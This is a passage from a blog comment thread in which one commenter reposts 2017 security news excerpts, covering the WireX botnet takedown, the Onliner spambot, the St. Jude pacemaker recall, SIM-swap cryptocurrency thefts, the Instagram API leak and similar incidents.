    The collaboration was informal. Security experts often move around the industry, but usually retain good relationships and continue those relationships. This happened with WireX. It first appeared on August 2nd, but was small enough to be ignored. Two weeks later it ramped up into something altogether different.

    In a joint and coordinated announcement and series of blogs, Flashpoint, Akamai, Cloudflare, and RiskIQ have today explained how their researchers, together with researchers from other organizations, detected, collaborated, and ultimately neutralized the botnet.

    Reply
28. August 29, 2017 at 7:38 pm

    Tomi Engdahl says:

    Irony: A site with a .fish domain was used to phish French bank customers
    https://thenextweb.com/security/2017/08/22/a-site-with-a-fish-domain-was-used-to-phish-french-bank-customers-and-my-irony-meter-just-exploded/#.tnw_NWBzxHj7

    It’s a hacking worthy of an Alanis Morissette song; a website with a generic .fish domain name was used to phish French banking customers, as spotted by the folks at Netcraft.

    Reply
29. August 29, 2017 at 8:44 pm

    Tomi Engdahl says:

    Dustin Volz / Reuters:
    Uber says it’s removing app feature that allows tracking of riders for up to five minutes after a trip, starting this week for iPhone users — PALO ALTO, Calif. (Reuters) – Uber Technologies Inc [UBER.UL] is pulling a heavily criticized feature from its app that allowed it to track riders …

    Uber to end post-trip tracking of riders as part of privacy push
    http://www.reuters.com/article/us-uber-privacy-idUSKCN1B90EN

    Reply
30. August 29, 2017 at 8:53 pm

    Tomi Engdahl says:

    Zack Whittaker / ZDNet:NEW
    Researcher uncovers open server with 711M email addresses and other credentials, including passwords and email server info, used by a spambot to send malware

    711 million email addresses ensnared in “largest” spambot
    http://www.zdnet.com/article/onliner-spambot-largest-ever-malware-campaign-millions/

    The spambot has collected millions of email credentials and server login information in order to send spam through “legitimate” servers, defeating many spam filters.

    A huge spambot ensnaring 711 million email accounts has been uncovered.

    A Paris-based security researcher, who goes by the pseudonymous handle Benkow, discovered an open and accessible web server hosted in the Netherlands, which stores dozens of text files containing a huge batch of email addresses, passwords, and email servers used to send spam.

    Those credentials are crucial for the spammer’s large-scale malware operation to bypass spam filters by sending email through legitimate email servers.

    The spambot, dubbed “Onliner,” is used to deliver the Ursnif banking malware into inboxes all over the world. To date, it’s resulted in more than 100,000 unique infections across the world, Benkow told ZDNet.

    Troy Hunt, who runs breach notification site Have I Been Pwned, said it was a “mind-boggling amount of data.”

    Hunt, who analyzed the data and details his findings in a blog post, called it the “largest” batch of data to enter the breach notification site in its history.

    But while spamming is still an effective malware delivery method, email filters are getting smarter and many domains found to have sent spam have been blacklisted.

    “To send spam, the attacker needs a huge list of SMTP credentials,” said Benkow in his blog post. Those credentials authenticate the spammer in order to send what appears to be legitimate email.

    “The more SMTP servers he can find, the more he can distribute the campaign,” he said.

    Those credentials, he explained, have been scraped and collated from other data breaches, such as the LinkedIn hack and the Badoo hack, as well also other unknown sources. The list has about 80 million accounts, he said, with each line containing the email address and password, along with the SMTP server and the port used to send the email.

    These 80 million email servers are then used to send the remaining 630 million targets emails, designed to scope out the victim, or so-called “fingerprinting” emails.

    Hunt has made the data now searchable in Have I Been Pwned.

    Inside the Massive 711 Million Record Onliner Spambot Dump
    https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/

    Reply
31. August 29, 2017 at 9:16 pm

    Tomi Engdahl says:

    Eric David / SiliconANGLE:
    Cyberprivacy platform startup Anonyome Labs raises $20.4M Series B, with Symantec CEO Greg Clark and Lifelock founder Todd Davis among investors

    Cyberprivacy startup Anonyome Labs raises $20.4M for secure messaging and payments
    https://siliconangle.com/blog/2017/08/28/cyber-privacy-startup-anonyome-labs-raises-20-4m-secure-messaging-payments/

    Anonyome Labs, a Utah-based startup that runs a cyberprivacy platform for consumers, announced today that it has closed a $20.4 million funding round.

    The Series B round included participation by existing investors Greg Clark, chief executive of Symantec Corp., and Crosspoint Ventures founder John Mumford, as well as new investors Hanna Ventures and Ariba co-founder Ken Eldred. The round also included a major investment from Todd Davis, founder and former chief executive of identity theft protection service LifeLock, who will also be joining Anonyome’s board of directors.

    Founded in 2014, Anonyome offers two mobile apps aimed at helping users keep their personal information secure and private. The first app, SudoApp, uses end-to-end encryption to allow users to securely make calls and send texts or emails to anyone, even if the recipient does not have the app installed. Anonyome’s second product is SudoPay, a digital payment service that lets users make purchases online without having to enter their personal information on each site.

    End-to-end encryption has been growing in popularity as more and more users become concerned about whether their personal information could be at risk.

    Reply
32. August 30, 2017 at 4:44 am

    Tomi Engdahl says:

    Internet providers could easily snoop on your smart home
    https://techcrunch.com/2017/08/28/study-tracks-what-smart-home-activity-can-be-seen-by-internet-providers/?ncid=rss&utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&utm_content=FaceBook&sr_share=facebook

    We’ve mostly moved past the point where our Internet of Things devices leak private information to anyone watching via unsecured connections, but that doesn’t mean you can stop being afraid. Never, ever stop being afraid. To top up your paranoia reserves, a new study finds that internet providers can, if they so choose, monitor all kinds of things from your smart home’s traitorous metadata.

    Reply
33. August 30, 2017 at 7:42 am

    Tomi Engdahl says:

    Swedish slip-up leaks hosting company’s customer data
    Bork bork bork! Hackers infiltrate major hosting provider Loopia
    http://www.theregister.co.uk/2017/08/29/loopia_hacked_customer_data_revealed/

    A major Swedish web hosting has been compromised and its entire customer database leaked.

    The company, Loopia, made the announcement here, saying the breach happened last Tuesday (August 22), and it notified customers on Friday, advising of a system-wide password reset and telling them to update their personal information.

    The statement says “the hackers have had access to parts of the customer database, including personal and contact information and encrypted (hashed) passwords to Loopia Kundzon”. Payment information such as credit cards didn’t leak, the company says, and customers’ hosted sites and e-mail services weren’t compromised.

    According to Upphandling24, Loopia has “hundreds of thousands” of customers

    https://support.loopia.se/wiki/utskick/

    Reply
34. August 30, 2017 at 12:46 pm

    Tomi Engdahl says:

    40% of manufacturing security professionals have no formal security strategy
    https://www.designnews.com/electronics-test/40-manufacturing-security-professionals-have-no-formal-security-strategy/115121990957373?ADTRK=UBM&elq_mid=788&elq_cid=876648

    Cisco cybersecurity survey also reported that 28% of manufacturing organizations suffered loss of revenue due to attacks in the past year.

    In its 90-page 2017 Midyear Cybersecurity Report, Cisco raised a warning flag because of the accelerating pace and rising level of sophistication in the global cyber threat landscape. Focusing on manufacturing, the report said that the combination of connected devices on outdated machines might be “ripe for exploitation.” But even more concerning is what might be viewed as a muted response by companies to potential security breaches.

    “A written security policy can provide a framework for improvements, yet according to the Cisco survey, 40 percent of the manufacturing security professionals said they do not have a formal security strategy, nor do they follow standardized information security policy practices such as ISO 27001 or NIST 800-53,” the report stated.

    Key Concerns for Manufacturing

    According to a Bloomberg study cited in the report, 80% of US factories are more than 20 years old and could be more vulnerable to attacks since systems are phased out gradually over time. Another potential issue is the use of a relatively large number of security vendors which could create a more complex and confusing picture as IT and OT personnel work together on security challenges, along with the number of personnel dedicated to security.

    Key Report Findings

    The report, in general, has a goal of keeping businesses apprised of cyber threats and vulnerabilities, and the steps companies can take to improve security and cyber-resiliency. Two dynamics are making the challenge for companies more difficult: the escalating impact of security breaches and the pace of technological change.

    Tactics being deployed by attackers is also a problem, so the report provides a comprehensive view of new developments in malware, attack methods, spam and unwanted applications such as spyware and business email compromise (BEC).

    The expectation is that defenders will struggle to maintain ground as the IoT continues to expand and the prospect of new types of attacks in the future. In response, the security community “needs to expand its thinking and dialogue about how to create an open ecosystem that will allow customers to implement security solutions that will work best for their organization and make the most of existing investments.”

    Reply
35. August 30, 2017 at 1:02 pm

    Tomi Engdahl says:

    Intel ME controller chip has secret kill switch
    Researchers find undocumented accommodation for government customers
    https://www.theregister.co.uk/2017/08/29/intel_management_engine_can_be_disabled/

    Security researchers at Moscow-based Positive Technologies have identified an undocumented configuration setting that disables Intel Management Engine 11, a CPU control mechanism that has been described as a security risk.

    Intel’s ME consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals. It handles much of the data travelling between the processor and external devices, and thus has access to most of the data on the host computer.

    If compromised, it becomes a backdoor, giving an attacker control over the affected device.

    That possibility set off alarms in May, with the disclosure of a vulnerability in Intel’s Active Management Technology, a firmware application that runs on the Intel ME.

    The revelation prompted calls for a way to disable the poorly understood hardware. At the time, the Electronic Frontier Foundation called it a security hazard. The tech advocacy group demanded a way to disable “the undocumented master controller inside our Intel chips” and details about how the technology works.

    An unofficial workaround called ME Cleaner can partially hobble the technology, but cannot fully eliminate it.

    On Monday, Positive Technologies researchers Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy said they had found a way to turn off the Intel ME by setting the undocumented HAP bit to 1 in a configuration file.

    HAP stands for high assurance platform. It’s an IT security framework developed by the US National Security Agency

    Disabling Intel ME 11 via undocumented mode
    http://blog.ptsecurity.com/2017/08/disabling-intel-me.html

    Reply
36. August 30, 2017 at 1:05 pm

    Tomi Engdahl says:

    F-Secure makes a cyber breakthrough testing on order

    If you saw a stranger at your workplace without a passport, would you tell anyone about it? Hardly. In Finnish firms, even unskilled persons are allowed to move relatively freely, and the absence of a passageway does not hurt either.

    Tuomo Makkonen (pictured) knows how confident in the local workplace are. He pulls F-Secure’s Red Team for work, whose members are able to break into office rather than office almost without exception.

    Red Team makes simulated data holes.

    In a typical case, the Red Team first monitors the office routines: where and with what time people are going to smoke, what kind of passageways hangs in the neck, what kind of security equipment is visible. You may infiltrate the coffee cup in your hand and walk in with the rest of the crowd. In a suitable situation cloned by someone’s staff pass and will be back in better time even at night.

    The goal is to conceal the so-called “drop box” or a remote-controlled device built from a card computer in the conference room or elsewhere near the network interface. It allows access to the internal network.

    F-Secure acquired a cyber-security company offering red teaming consulting company nSense two years ago. Customers are on their way from media houses to industrial companies. Especially the top management is always reluctant to report, as they help to improve security in a concrete way.

    Some of the tools are built by themselves. For example, the team has developed a tool for circumventing electronic access control. The signal of the cloned key is supplied with a strong antenna to the door’s electronic lock. Previously there was a need for a hammer, now the door can be traversed without traces.

    According to Makkonen, the access control device is only a small computer, so there are similar shortcomings. Organizations are also lazy and often give employees access to almost anything.

    Source: http://www.tivi.fi/Kaikki_uutiset/f-secure-tekee-tietomurtoja-tilauksesta-matonvaihtaja-voikin-olla-huijari-6672283

    Reply
37. August 30, 2017 at 1:05 pm

    Tomi Engdahl says:

    “Security always has three parts: a technical element, a process element, and a human element. We need to find weakness for only one. ”

    Source: http://www.tivi.fi/Kaikki_uutiset/f-secure-tekee-tietomurtoja-tilauksesta-matonvaihtaja-voikin-olla-huijari-6672283

    Reply
38. August 30, 2017 at 8:27 pm

    Tomi Engdahl says:

    Charlie Osborne / ZDNet:
    FDA recalls around 465,000 St. Jude Medical pacemaker models in US, many implanted in patients, for firmware patching of vulnerabilities; OTA fix not an option — Heart patients will have to visit their doctors to have their pacemakers patched for the “voluntary” recall — but there are risks.

    FDA issues recall of 465,000 St. Jude pacemakers to patch security holes
    http://www.zdnet.com/article/fda-forces-st-jude-pacemaker-recall-to-patch-security-vulnerabilities/

    Heart patients will have to visit their doctors to have their pacemakers patched for the “voluntary” recall — but there are risks.

    In what may be a first, patients with heart conditions that are using particular pacemaker brands will have to visit their doctors for firmware updates to keep their embedded devices safe from tampering.

    It seems such an odd concept at first, but with many kinds of pacemakers now “smarter,” with connections to mobile devices and diagnostic systems, the avenue has been carved for these medical devices to potentially be tampered with, should a threat actor choose.

    In particular, Abbott’s pacemakers, formerly of St. Jude Medical, have been “recalled” by the US Food and Drug Administration (FDA) on a voluntary basis.

    The devices must be given a firmware update to protect them against a set of critical vulnerabilities, first reported by MedSec, which could drain pacemaker battery life, allow attackers to change programmed settings, or even change the beats and rhythm of the device.

    On Tuesday, the FDA issued a security advisory, warning that the pacemakers must be recalled — and as they are embedded within the chests of their users, this requires a home visit or trip to the hospital to have the software patch applied.

    The Accent, Anthem, Accent MRI, Accent ST, Assurity, and Allure models are all affected.

    The FDA estimates that in total, 465,000 pacemakers in the US are impacted — although it is not known how many may be outside the United States.

    the update could not be delivered over the air and requires roughly three minutes in the presence of the patient to download and install while in backup mode.

    Patients are asked to contact their doctors to book themselves in for the update. However, doctors have been advised by Abbott to update only if “appropriate given the risk of update for the patient.”

    Unfortunately, installing the firmware update can result in a failure to update altogether, the loss of programmed settings, the loss of diagnostic data, as well as a very small risk — 0.003 percent — of complete functionality loss.

    The FDA reminds patients, patient caregivers, and health care providers that any medical device connected to a communications network (e.g. Wi-Fi, public or home internet) may have cybersecurity vulnerabilities that could be exploited by unauthorized users,” the FDA says. “However, the increased use of wireless technology and software in medical devices can also often offer safer, more efficient, convenient, and timely health care delivery.”

    Firmware Update to Address Cybersecurity Vulnerabilities Identified in Abbott’s (formerly St. Jude Medical’s) Implantable Cardiac Pacemakers: FDA Safety Communication
    https://www.fda.gov/MedicalDevices/Safety/AlertsandNotices/ucm573669.htm

    Reply
39. August 31, 2017 at 11:23 am

    Tomi Engdahl says:

    FDA Issues Recall of 465,000 St. Jude Pacemakers To Patch Security Holes
    https://science.slashdot.org/story/17/08/30/176217/fda-issues-recall-of-465000-st-jude-pacemakers-to-patch-security-holes?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot%2Fto+%28%28Title%29Slashdot+%28rdf%29%29

    It seems such an odd concept at first, but with many kinds of pacemakers now “smarter,” with connections to mobile devices and diagnostic systems, the avenue has been carved for these medical devices to potentially be tampered with, should a threat actor choose. In particular, Abbott’s pacemakers, formerly of St. Jude Medical, have been “recalled” by the US Food and Drug Administration (FDA) on a voluntary basis.

    FDA issues recall of 465,000 St. Jude pacemakers to patch security holes
    Heart patients will have to visit their doctors to have their pacemakers patched for the “voluntary” recall — but there are risks.
    http://www.zdnet.com/article/fda-forces-st-jude-pacemaker-recall-to-patch-security-vulnerabilities/

    In what may be a first, patients with heart conditions that are using particular pacemaker brands will have to visit their doctors for firmware updates to keep their embedded devices safe from tampering.

    It seems such an odd concept at first, but with many kinds of pacemakers now “smarter,” with connections to mobile devices and diagnostic systems, the avenue has been carved for these medical devices to potentially be tampered with, should a threat actor choose.

    The devices must be given a firmware update to protect them against a set of critical vulnerabilities, first reported by MedSec, which could drain pacemaker battery life, allow attackers to change programmed settings, or even change the beats and rhythm of the device.

    Reply
40. August 31, 2017 at 11:24 am

    Tomi Engdahl says:

    Instagram API found leaking ‘high-profile’ email addresses and phone numbers
    http://www.zdnet.com/article/instagram-api-found-leaking-high-profile-email-addresses-and-phone-numbers/

    The Facebook-owned company says no passwords were leaked, but is warning users about suspicious calls and texts.

    Instagram has alerted all its verified users of unlawful access to phone and email contact information for its “high-profile” users thanks to a buggy API.

    The company said no passwords were accessed, it quickly fixed the bug, and is conducting an investigation into the incident.

    “At this point we believe this effort was targeted at high-profile users,” the photo-sharing site said in its alert. “We encourage you to be extra vigilant about the security of your account and exercise caution if you encounter any suspicious activity such as unrecognized incoming calls, texts, and emails.”

    “Your experience on Instagram is important to us, and we are sorry this happened.”

    Reply
41. August 31, 2017 at 11:25 am

    Tomi Engdahl says:

    Enterprises (especially retail, hospitality) struggle with payment card data security standards
    http://www.zdnet.com/article/enterprises-especially-retail-hospitality-struggle-with-payment-card-data-security-standards/

    A Verizon report highlights that more organizations are compliant with PCI DSS, but companies still struggle with security controls.

    Enterprises are complying with the Payment Card Industry Data Security Standard (PCI DSS) more, but the number of organizations in compliance is still low enough to leave the door open for cyberattacks, according to Verizon.

    First, the good news. According to the Verizon 2017 Payment Security Report, 55.4 percent of organizations complied with PCI when validated in 2016, up from 48.4 percent in 2015. However, maintaining compliance is an issue, said Verizon.

    And there are still 44.6 percent of organizations such as retailers, restaurants and hotels not up to PCI standards. PCI DSS standards are there to allow businesses to take card payments and protect systems from cardholder data breaches. The requirements include items such as firewalls, data in transit controls, encryption and authentication.

    That lack of compliance is notable because of all of the payment card data breaches investigated by Verizon no organizations were fully compliant at the time of the breach. Simply put, PCI DSS compliance is directly linked to data breaches.

    Key items from the Verizon payment security report:

    The IT services industry had the highest full PCI DSS compliance with 61.3 percent fully compliant during interim validation.
    59.1 percent of financial services organizations were fully compliant, but many struggled with security procedures, configurations, vulnerability management and overall risk.
    50 percent of retailers and 42.9 percent of hospitality organizations were PCI-DSS compliant. Retailers struggled with security testing, encrypted data transmissions and authentication and hospitality and travel groups struggled with security hardening, protecting data in transit and physical security.
    13 percent of companies failed interim assessments due to absent controls.

    Reply
42. August 31, 2017 at 11:32 am

    Tomi Engdahl says:

    In colossal screw up, Essential shared customers’ driver’s licenses over email
    There’s a difference between scrappy and sloppy
    https://www.theverge.com/2017/8/30/16226028/essential-customer-email-drivers-license-phishing

    Last night, some customers who had preordered an Essential phone received an email asking for a copy of their driver’s license, ostensibly to verify their address in an attempt to prevent fraud.

    Dozens of customers replied with their personal information, but those emails didn’t just go to Essential; they went out to everybody who had received the original email. That means that an unknown number of Essential customers are now in possession of each other’s drivers license, birth date, and address information.

    The incident is being reported as phishing by many outlets, because it looks and smells quite a lot like a phishing attempt: a weird request for personal information. After examining the email headers, it doesn’t look like this was an actual phishing attempt. It seems much more likely that this was a colossal screw up, the result of a misconfigured customer support email list.

    What appears to have happened is that Essential had a list of customers it needed to verify to prevent fraud, so it sent them an email requesting more information. But that email address was set up as a group email, which meant that replies sent to it went to everybody on that email list. It was a misconfigured customer support address on Zendesk, a customer service portal.

    We don’t know how or why the email address was configured this way. It could have been a simple misconfiguration or potentially even a disgruntled employee, Schnell says. Whatever the original cause — a phishing scam, a stupid mistake, or something else — the end result that people sent emails with personal information that ended up going to total strangers.

    Essential CEO Andy Rubin later apologized, stating that the incident is “humiliating” and that he holds himself “personally responsible for the error.” Rubin also noted that Essential will offer one year of LifeLock to the affected patrons.

    Essential customers hit with deceptive phishing emails
    It’s still unclear what’s going on, but it’s probably for the best to leave that email alone.
    https://www.engadget.com/2017/08/30/essential-phone-deceptive-phishing-emails/

    Some customers who pre-ordered the Essential phone have reported getting suspicious emails asking for “additional verifying information.” Based on the copy someone posted on Reddit, the email is asking for a photo ID clearly showing your picture, signature and current billing address. The email was sent by an @essential address and looks pretty legit. But since the company says it’s investigating the situation and has “taken steps to mitigate” the issue, then it’s best to assume that it’s a phishing scheme, a scam of some sort or just anything you should not reply to with any identifying info.

    Reply
43. August 31, 2017 at 11:39 am

    Tomi Engdahl says:

    Identity Thieves Hijack Cellphone Accounts to Go After Virtual Currency
    https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html

    Hackers have discovered that one of the most central elements of online security — the mobile phone number — is also one of the easiest to steal.

    In a growing number of online attacks, hackers have been calling up Verizon, T-Mobile U.S., Sprint and AT&T and asking them to transfer control of a victim’s phone number to a device under the control of the hackers.

    Once they get control of the phone number, they can reset the passwords on every account that uses the phone number as a security backup — as services like Google, Twitter and Facebook suggest.

    “My iPad restarted, my phone restarted and my computer restarted, and that’s when I got the cold sweat and was like, ‘O.K., this is really serious,’” said Chris Burniske, a virtual currency investor who lost control of his phone number late last year.

    A wide array of people have complained about being successfully targeted by this sort of attack

    But a particularly concentrated wave of attacks has hit those with the most obviously valuable online accounts: virtual currency fanatics like Mr. Burniske.

    Within minutes of getting control of Mr. Burniske’s phone, his attackers had changed the password on his virtual currency wallet and drained the contents — some $150,000 at today’s values.

    Most victims of these attacks in the virtual currency community have not wanted to acknowledge it publicly for fear of provoking their adversaries. But in interviews, dozens of prominent people in the industry acknowledged that they had been victimized in recent months.

    “Everybody I know in the cryptocurrency space has gotten their phone number stolen,” said Joby Weeks, a Bitcoin entrepreneur.

    Mr. Weeks lost his phone number and about a million dollars’ worth of virtual currency late last year, despite having asked his mobile phone provider for additional security after his wife and parents lost control of their phone numbers.

    The attackers appear to be focusing on anyone who talks on social media about owning virtual currencies or anyone who is known to invest in virtual currency companies, such as venture capitalists. And virtual currency transactions are designed to be irreversible.

    In a number of cases involving digital money aficionados, the attackers have held email files for ransom — threatening to release naked pictures in one case, and details of a victim’s sexual fetishes in another.

    The vulnerability of phone numbers is the unintended consequence of a broad push in the security industry to institute a practice, known as two-factor authentication, that is supposed to help make accounts more secure.

    Many email providers and financial firms require customers to tie their online accounts to phone numbers, to verify their identity. But this system also generally allows someone with the phone number to reset the passwords on these accounts without knowing the original passwords. A hacker just hits “forgot password?” and has a new code sent to the commandeered phone.

    Mr. Pokornicky was online at the time his phone number was taken, and he watched as his assailants seized all his major online accounts within a few minutes.

    “It felt like they were one step ahead of me the whole time,” he said.

    The speed with which the attackers move has convinced people who are investigating the hacks that the attacks are generally run by groups of hackers working together.

    Mr. Perklin and other people who have investigated recent hacks said the assailants generally succeeded by delivering sob stories about an emergency that required the phone number to be moved to a new device — and by trying multiple times until a gullible agent was found.

    “These guys will sit and call 600 times before they get through and get an agent on the line that’s an idiot,” Mr. Weeks said.

    Coinbase, one of the most widely used Bitcoin wallets, has encouraged customers to disconnect their mobile phones from their Coinbase accounts.

    Reply
44. August 31, 2017 at 11:47 am

    Tomi Engdahl says:

    AccuWeather Still Sharing User Data Without Consent Despite Update
    AccuWeather previous shipped update to stop data collection
    http://news.softpedia.com/news/accuweather-still-sharing-user-data-without-consent-despite-update-517514.shtml

    You wouldn’t normally expect a company the size of AccuWeather to be involved in such a scandal, but it looks like the firm wasn’t saying the whole truth earlier this week when it promised to address claims of privacy violations by its iOS client.

    A research has shown that despite an update released a couple of days ago, AccuWeather for iOS still shares user data without consent, even though the company specifically promised to address this problem.

    Earlier this week, security researcher Will Strafach discovered that AccuWeather for iOS was sharing some user data with a data monetization firm called Reveal Mobile even when location sharing was disabled. AccuWeather published an update on Thursday and issued a public apology, emphasizing the company considers user privacy a priority and promising not to collect data without consent ever again.

    And yet, despite the update, it turns out that AccuWeather is still sharing some user data with an advertiser, again without users giving their consent.

    Reply
45. August 31, 2017 at 2:41 pm

    Tomi Engdahl says:

    Todd Spangler / Variety:
    Instagram says some high-profile accounts have been breached, exposing phone numbers and email addresses via a bug in the API, now fixed — Instagram said at least one hacker was able to steal personal information from high-profile user accounts, blaming the breach on a bug in its system that has now been fixed.

    Instagram Says Hackers Obtained ‘High-Profile’ Users’ Email Addresses, Phone Numbers
    http://variety.com/2017/digital/news/instagram-hackers-obtained-users-email-addresses-phone-numbers-1202543339/

    Instagram said at least one hacker was able to steal personal information from high-profile user accounts, blaming the breach on a bug in its system that has now been fixed.

    “We recently discovered that one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information – specifically email address and phone number — by exploiting a bug in an Instagram API,” a rep said in a statement.

    Instagram said no account passwords were exposed, and that it has corrected the bug that allowed the information to be stolen. The glitch in Instagram’s application programming interface made it possible for someone to obtain a set of code that possibly contained email addresses and phone numbers of targeted user accounts.

    The Facebook-owned service said it believes the hack was aimed at “high-profile users” and that it has notified verified account holders of the issue. An Instagram rep declined to disclose which accounts may have been compromised.

    Reply
46. September 1, 2017 at 7:33 am

    Tomi Engdahl says:

    Hacking risk leads to recall of 500,000 pacemakers due to patient death fears
    https://www.theguardian.com/technology/2017/aug/31/hacking-risk-recall-pacemakers-patient-death-fears-fda-firmware-update

    FDA overseeing crucial firmware update in US to patch security holes and prevent hijacking of pacemakers implanted in half a million people

    Almost half a million pacemakers have been recalled by the US Food and Drug Administration (FDA) due to fears that their lax cybersecurity could be hacked to run the batteries down or even alter the patient’s heartbeat.

    The recall won’t see the pacemakers removed, which would be an invasive and dangerous medical procedure for the 465,000 people who have them implanted: instead, the manufacturer has issued a firmware update which will be applied by medical staff to patch the security holes.

    Six types of pacemaker, all made by healthtech firm Abbott and sold under the St Jude Medical brand, are affected by the recall. They are all radio-controlled implantable cardiac pacemakers, typically fitted to patients with slow or irregular heartbeats, as well as those recovering from heart failure.

    There have been no reports of unauthorised access to any patient’s implanted device, according to Abbot. The FDA says that the vulnerability allows an unauthorised user to access a device using commercially available equipment and reprogram it. The hackers could then deliberately run the battery flat, or conduct “administration of inappropriate pacing”. Both could, in the worst case, result in the death of an affected patient.

    The US Department of Homeland Security said that “it is recommended that healthcare providers discuss this update with their patients and carefully consider the potential risk of a cybersecurity attack along with the risk of performing a firmware update”.

    Reply
47. September 1, 2017 at 8:39 am

    Tomi Engdahl says:

    Cyber-flaw affects 745,000 pacemakers
    http://www.bbc.com/news/amp/technology-41099867

    A total of 745,000 pacemakers have been confirmed as having cyber-security issues that could let them be hacked.

    The Food and Drug Administration revealed that 465,000 pacemakers in the US were affected, in an advisory note about a fix to the problem.

    The pacemaker’s manufacturer, Abbott, told the BBC there were a further 280,000 devices elsewhere.

    The flaws could theoretically be used to cause the devices to pace too quickly or run down their batteries.

    However, Abbott said it was not aware of any cases of this happening, adding that it would require a “highly complex set of circumstances”.

    The Department of Homeland Security has said that an attacker would need “high skill” to exploit the vulnerabilities.

    Pacemakers manufactured after 28 August will come with the new firmware pre-installed.

    “As with any firmware update, there is a very low risk of an update malfunction,” the FDA said.

    The regulator noted a very small number of St Jude devices had lost all functionality after a firmware update in the past.

    Abbott said some patients might opt to continue with the old firmware as a consequence.

    Reply
48. September 1, 2017 at 8:42 am

    Tomi Engdahl says:

    US government: We can jail you indefinitely for not decrypting your data
    Ex-cop in child abuse case approaching 2 years in the clink
    https://www.theregister.co.uk/2017/08/30/ex_cop_jailed_for_not_decrypting_data/?mt=1504175878929

    The US government is fighting to keep a former police officer in prison because he claims not to be able to remember the code to decrypt two hard drives under investigation.

    Francis Rawls, a former sergeant in the Philadelphia police department, has spent nearly two years in prison for contempt of court after refusing to provide the passcode for two hard drives that were taken from his house in 2015 during an investigation into child abuse images.

    Rawls claims he can’t remember the passcode for the two drives, encrypted using Apple’s FileVault system. The government says that he’s stalling because he fears that the contents could see him in serious trouble with his former employers.

    It says that they are not asking him for his decryption keys per se – they’re simply saying he needs to perform the physical act of decrypting the drives and he’s free to go. The government is also arguing that, as Rawls didn’t use his Fifth Amendment rights in his initial appeal he can’t try to use that defense now.

    Reply
49. September 1, 2017 at 9:19 am

    Tomi Engdahl says:

    Malware writer offers free trojan to hackers, with one small drawback
    Beware of geeks bearing Cobian RAT gifts
    https://www.theregister.co.uk/2017/08/31/free_trojan_for_hackers/

    Those looking on the dark web for malware capable of hijacking computers might have thought they were getting a bargain when a free trojan appeared on various online souks over the past few months.

    The malware generator, dubbed the Cobian remote access trojan (RAT) by researchers at security shop Zscaler, is a fairly elemental bit of code and is based around the njRAT that surfaced around four years ago. It comes with all the usual bells and whistles – a keylogger, webcam hijacker, screen capturing and the ability to run your own code on an infected system.

    But the Cobain RAT also has a secondary payload built in, hidden in an encrypted library. Once activated, it allows the original author of the malware to take control of any computers infected by the attack code and, if necessary, cut off the criminal who caused the infection in the first place.

    “It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author,”

    Reply
50. September 1, 2017 at 9:21 am

    Tomi Engdahl says:

    Ex-Harrods IT worker pleads guilty to PC repair shop trip
    Hitchin man tried to have company-issued laptop taken off store’s domain
    https://www.theregister.co.uk/2017/08/30/ex_harrods_man_pardeep_parmar_computer_misuse_plea/

    A former Harrods IT worker has pleaded guilty to a charge under the Computer Misuse Act of trying to get a computer repair shop to take his company-issued laptop off the Harrods domain.

    taken the laptop to a local computer repair shop in Hitchin and asking workers there to remove it from the domain of the posh London emporium.

    Prosecutors said this amounts to the criminal offence of “causing a computer to perform a function to secure or enable unauthorised access to a program or data”, contrary to sections 1(1) and (3) of the Computer Misuse Act 1990.

    Defending the 30-year-old, Sundeep Pankhania of Marylebone solicitors’ firm HP Gower said his client had done this to try and save some personal files on his company-issued laptop, including his National Insurance number, and wanted to get access to those.

    The former Harrods worker also pleaded not guilty to stealing the Dell laptop from the Knightsbridge department store.

    Reply